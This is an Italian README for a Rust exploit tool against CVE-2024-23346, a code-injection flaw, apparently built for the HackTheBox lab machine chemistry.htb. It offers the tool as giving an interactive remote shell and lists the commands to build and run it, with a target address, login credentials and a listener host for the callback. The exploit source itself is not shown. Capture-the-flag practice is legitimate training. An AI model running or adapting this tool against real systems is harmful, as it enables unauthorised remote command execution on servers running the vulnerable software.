
Un exploit in Rust per CVE-2024-23346 che funziona come un "terminale" (testato su chemistry.htb)
Uno script di exploit in Rust per CVE-2024-23346.
Come mostrato sotto, il POC sfrutta la vulnerabilità di code injection ed esegue comandi shell remoti come in un Terminale.
Passi per eseguire l'exploit:
Cargo
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19OPPURE
cargo build -r (il binario si troverà in target/release/poc)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19Lo script di exploit è ispirato dall'esperto di scripting Python MAWK0235